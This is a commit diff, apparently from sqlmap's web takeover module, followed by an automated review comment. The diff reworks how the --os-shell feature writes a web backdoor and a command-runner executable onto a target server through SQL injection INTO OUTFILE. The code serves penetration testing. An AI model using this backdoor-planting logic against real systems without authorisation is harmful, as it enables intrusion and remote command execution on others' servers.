

Commit 24d3e24

committed
more updates regarding --os-shell feature
1 parent b558712 commit 24d3e24

2 files changed

Lines changed: 16 additions & 17 deletions


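--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -111,7 +111,7 @@ def __webFileStreamUpload(self, stream, destFileName, directory):
 
     def __webFileInject(self, fileContent, fileName, directory):
         outFile = posixpath.normpath("%s/%s" % (directory, fileName))
-        uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
+        uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\') if kb.os == "Windows" else directory)
         query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
         query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
         query = agent.prefixQuery(" %s" % query)
@@ -200,24 +200,23 @@ def webInit(self):
             logger.info(infoMsg)
 
             if self.webApi == "asp":
-                scriptsDirectory = "Scripts"
                 runcmdName = "tmpe%s.exe" % randomStr(4)
                 runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
-                backdoorUploaded = False
-                for backdoorDirectoryFormat in ("%s.\%s", "%s..\%s", "%s..\..\%s"):
-                    backdoorDirectory = backdoorDirectoryFormat % (posixToNtSlashes(directory), scriptsDirectory)
-                    backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
-                    backdoorStream.file.truncate()
-                    backdoorStream.read()
-                    backdoorStream.seek(0)
-                    backdoorStream.write(backdoorContent)
-                    if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
-                        self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
-                        self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
-                        self.webDirectory = backdoorDirectory
-                        backdoorUploaded = True
-                        break
-                if not backdoorUploaded:
+                match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
+                if match:
+                    backdoorDirectory = match.group(1)
+                else:
+                    continue
+                backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
+                backdoorStream.file.truncate()
+                backdoorStream.read()
+                backdoorStream.seek(0)
+                backdoorStream.write(backdoorContent)
+                if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
+                    self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
+                    self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName)
+                    self.webDirectory = backdoorDirectory
+                else:
                     continue
             elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
                 warnMsg = "backdoor hasn't been successfully uploaded "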
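Review bot: In the second hunk the directory captured by `match.group(1)` is used as-is both as the `WRITABLE_DIR` substitution in the backdoor content and as the upload directory, so the only filter on that value is the pattern's `[^"]+`, and since `uplPage` is defined outside the hunk I cannot tell where it is read; a value the ASP source or a path cannot carry would fail only at upload time, so logging `backdoorDirectory` at debug level before the `__webFileStreamUpload` call would make such failures diagnosable. The hidden-field name `scriptsdir` in the regex is a contract with shell/uploader.asp_, which this commit also changes but is shown here only as a binary blob; a comment such as `# 'scriptsdir' is the hidden input emitted by shell/uploader.asp_ - keep both in sync` would make that coupling visible to the next maintainer. The URL in `self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName)` still hard-codes `Scripts` while the filesystem directory now comes from the page, so the two may disagree if the uploader reports a scripts directory that is not served under `/Scripts/`. As a point of style, the `if match: ... else: continue` pair reads more directly as a guard, `if not match: continue` followed by `backdoorDirectory = match.group(1)`. webInit's body begins and ends outside the hunk.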

shell/uploader.asp_

39 Bytes
Binary file not shown.
